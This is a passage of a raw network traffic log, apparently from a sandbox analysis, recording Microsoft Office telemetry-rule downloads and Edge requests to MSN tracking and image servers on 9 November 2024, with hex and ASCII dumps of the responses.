135	192.168.2.7	53056	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:35 UTC	192	OUT	GET /rules/rule702950v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:35 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:35 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDC22447" x-ms-request-id: ddaecdfb-101e-0079-21d2-2c5913000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014735Z-16547b76f7fknvdnhC1DFWxnys0000000ahg000000007c4z x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:35 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.7	53058	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:35 UTC	192	OUT	GET /rules/rule701151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:36 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:35 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE055B528" x-ms-request-id: d0aff24d-301e-000c-58d2-2c323f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014735Z-16547b76f7fq9mcrhC1DFWq15w0000000aeg00000000bqq7 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:36 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.7	53061	20.125.209.212	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:36 UTC	1261	OUT	GET /c.gif?rnd=1731116851926&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a598ac3b3e2d48a2b71daf2c0b512480&activityId=a598ac3b3e2d48a2b71daf2c0b512480&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=3A66BFEA2F024D7D9C9C07749E98C1C6&MUID=1A1E8714CE116135161B9226CFE060A6 HTTP/1.1 Host: c.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=1A1E8714CE116135161B9226CFE060A6; _EDGE_S=F=1&SID=14F9B7E8AA396BDD1722A2DAAB0C6AEE; _EDGE_V=1; SM=T
2024-11-09 01:47:36 UTC	983	IN	HTTP/1.1 200 OK Cache-Control: private, no-cache, proxy-revalidate, no-store Pragma: no-cache Content-Type: image/gif Last-Modified: Wed, 16 Oct 2024 06:33:28 GMT Accept-Ranges: bytes ETag: "b116c54f951fdb1:0" Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure; Set-Cookie: MUID=1A1E8714CE116135161B9226CFE060A6; domain=.msn.com; expires=Thu, 04-Dec-2025 01:47:36 GMT; path=/; SameSite=None; Secure; Priority=High; Set-Cookie: SRM_M=1A1E8714CE116135161B9226CFE060A6; domain=c.msn.com; expires=Thu, 04-Dec-2025 01:47:36 GMT; path=/; SameSite=None; Secure; Set-Cookie: MR=0; domain=c.msn.com; expires=Sat, 16-Nov-2024 01:47:36 GMT; path=/; SameSite=None; Secure; Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Sat, 09-Nov-2024 01:57:36 GMT; path=/; SameSite=None; Secure; Date: Sat, 09 Nov 2024 01:47:35 GMT Connection: close Content-Length: 42
2024-11-09 01:47:36 UTC	42	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b Data Ascii: GIF89a!,L;

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.7	53065	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:36 UTC	192	OUT	GET /rules/rule701150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:36 UTC	515	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:36 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE1223606" x-ms-request-id: 16747fc2-a01e-001e-5e0d-3249ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014736Z-15869dbbcc6tfpj2hC1DFW384c000000043000000000s8kx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-09 01:47:36 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.7	53066	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:36 UTC	192	OUT	GET /rules/rule702200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:36 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:36 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDEB5124" x-ms-request-id: 86fb53ab-501e-0078-4ed2-2c06cf000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014736Z-16547b76f7fp6mhthC1DFWrggn0000000ahg00000000f151 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:36 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.7	53067	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:36 UTC	192	OUT	GET /rules/rule702201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:36 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:36 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT ETag: "0x8DC582BE7262739" x-ms-request-id: 36c217ee-101e-008e-63b5-2fcf88000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014736Z-15869dbbcc65c582hC1DFWgpv4000000048g000000008et3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:36 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.7	53068	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:36 UTC	192	OUT	GET /rules/rule700401v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:36 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:36 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDCB4853F" x-ms-request-id: 4630a231-e01e-0020-14ff-2bde90000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014736Z-16547b76f7fxdzxghC1DFWmf7n0000000ak000000000cct0 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:36 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.7	53069	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:36 UTC	192	OUT	GET /rules/rule700400v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:36 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:36 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB779FC3" x-ms-request-id: fe4e74db-301e-003f-25bc-2c266f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014736Z-16547b76f7fr28cchC1DFWnuws0000000akg00000000b52r x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:36 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.7	53070	23.38.189.81	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:36 UTC	634	OUT	GET /tenant/amp/entityid/BB1msDBP.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-09 01:47:37 UTC	519	IN	HTTP/1.1 200 OK Content-Type: image/jpeg Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msDBP Last-Modified: Mon, 04 Nov 2024 01:33:41 GMT X-Source-Length: 59155 X-Datacenter: eastus X-ActivityId: d662e24d-01e5-485f-8cb9-36d351447fcf Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Length: 59155 Cache-Control: public, max-age=387976 Expires: Wed, 13 Nov 2024 13:33:52 GMT Date: Sat, 09 Nov 2024 01:47:36 GMT Connection: close
2024-11-09 01:47:37 UTC	15865	IN	Data Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
2024-11-09 01:47:37 UTC	16384	IN	Data Raw: 40 c1 9d a0 da 00 d4 26 32 c8 84 1b 03 01 50 d3 b8 4a 59 c9 cf ab 29 a6 9e 07 ad e5 79 ba 73 52 c4 f1 5d 06 d9 59 b5 65 39 46 3b 9b 71 9c 79 b7 db dd 9c 27 c9 f4 29 1c e2 72 9c ed 39 89 26 76 13 93 cc cf 09 c6 6a 5e 9e 39 46 51 70 d0 22 04 c9 a9 a4 82 90 4a 34 92 44 90 08 da c8 51 9c 92 40 34 da 41 24 69 24 d1 f8 20 dd 04 bd 90 02 11 04 5d db c6 49 55 14 d7 7a 4c a9 5f 27 94 ee 50 5d 26 82 b1 cf 2c 79 4c a3 2c 31 9e 71 0e 3d 7d 9d a2 96 9f 1c 0e 6e 67 21 98 be c7 d1 f2 3d 58 53 37 8f 51 9c 79 b0 cb d3 e1 2f 07 5f 2a d5 e8 a7 57 2e 96 83 e8 ae 9a 6a bd 26 61 57 29 91 5d f4 25 c0 e9 c7 d6 71 89 f9 39 f2 f4 77 ca 61 cf 75 08 d8 92 2c 97 4c ec d2 2b 04 92 46 56 90 2d 90 a0 c8 11 6c 85 21 a4 13 0c 0f a2 0d 00 20 94 22 30 b6 20 ca c5 0a 11 40 ac 04 81 81 05 13 Data Ascii: @&2PJY)ysR]Ye9F;qy')r9&vj^9FQp"J4DQ@4A$i$ ]IUzL_'P]&,yL,1q=}ng!=XS7Qy/_*W.j&aW)]%q9wau,L+FV-l! "0 @
2024-11-09 01:47:37 UTC	2474	IN	Data Raw: 90 1a 85 31 8d 7e 02 d9 d7 c0 de 09 64 5a 8f 4a bd 91 6c eb e0 5a 81 7c aa f6 95 fa 57 43 1e a9 3d 30 af 67 bf d8 57 45 ea 0d de 66 52 fb a9 33 79 f9 2b 4b 7d 03 bc ff 00 6c a7 f4 f1 82 58 c7 a6 7a 09 63 c7 83 92 3e 6b 2f 45 35 3e a4 23 e6 f6 51 ee 5c 63 bb 3f 0a 75 6d f1 6b e9 f7 f5 0c b2 bb e4 a8 f9 ca f4 53 4a e8 9f 89 93 e6 b3 bf 54 70 48 af 0f 73 cb dd 3e 26 df 9b a6 b2 87 f4 8e 2b cf cd 7f f6 56 64 eb ad df 5d 4f a5 8f c1 cf f7 47 e4 bc 5c 78 3d 05 84 af 69 0b 39 54 df 5d 1f 89 1e 78 90 57 81 c7 29 f6 4f 8b ff 00 18 77 bd 7e 5d 7f d9 4f 44 b1 7f bb e5 d6 96 fa 3c 4e 13 41 82 bc 0c 78 e4 5e 2e 5c 21 d8 7c f6 56 8a 2a 7d 48 cd f3 fb 32 d7 4b 39 90 c9 0f 61 51 b3 87 04 f8 b9 f1 85 d7 cf 66 e8 54 ae 89 ef 31 7c ce 6d 57 d4 fb bb 8a f6 49 05 e8 c2 3b 42 Data Ascii: 1~dZJlZ\|WC=0gWEfR3y+K}lXzc>k/E5>#Q\c?umkSJTpHs>&+Vd]OG\x=i9T]xW)Ow~]OD<NAx^.\!\|V*}H2K9aQfT1\|mWI;B
2024-11-09 01:47:37 UTC	16384	IN	Data Raw: 45 d7 53 ba d3 47 a7 b2 9b cb a6 30 74 da a9 68 6e 04 97 15 d7 a5 e0 9f e8 5b f4 29 1f 8b e4 5e 17 9b ce 59 cd a5 b5 65 a6 aa 9a 52 4f ca b4 d9 4a 56 3f 99 8b 0d 25 14 b5 67 1a 14 4c 36 f1 94 b6 cd d5 b8 47 a4 b1 fe 9d 1b fc ff 00 99 e9 de d3 d0 ee 32 69 35 99 53 5e 5a 5a 54 53 a1 3d af 77 b0 fc 58 2f 0a 5e 7e ca 52 94 45 15 26 a3 cd 66 97 7e c4 da 7a 26 56 83 2a a8 a5 d3 5e c9 d1 e6 99 d2 b4 55 17 b5 4a 58 69 3d 25 59 58 a5 52 4d a4 9d 72 a6 9a 14 df 45 3b 78 19 3c 8a 6a b4 a3 e9 a6 d5 2e fa aa 9d 3b 12 db 10 54 6e 42 67 6e 5c 0a f2 a1 d7 57 95 fa 74 d3 42 fd 34 a7 85 b6 f6 6c 6b 15 a4 ad 57 2e a8 84 e6 28 6a db 8f 36 64 e2 9d 2b f4 7e 66 e0 f4 9f db d0 ea c9 69 45 ba 21 2c 5a a5 3e 9c 56 dc 4c 17 2a 92 9c 70 9c a6 e7 ea a5 e8 4d e0 96 e9 65 c6 e7 9a 27 Data Ascii: ESG0thn[)^YeROJV?%gL6G2i5S^ZZTS=wX/^~RE&f~z&V^UJXi=%YXRMrE;x<j.;TnBgn\WtB4lkW.(j6d+~fiE!,Z>VLpMe'
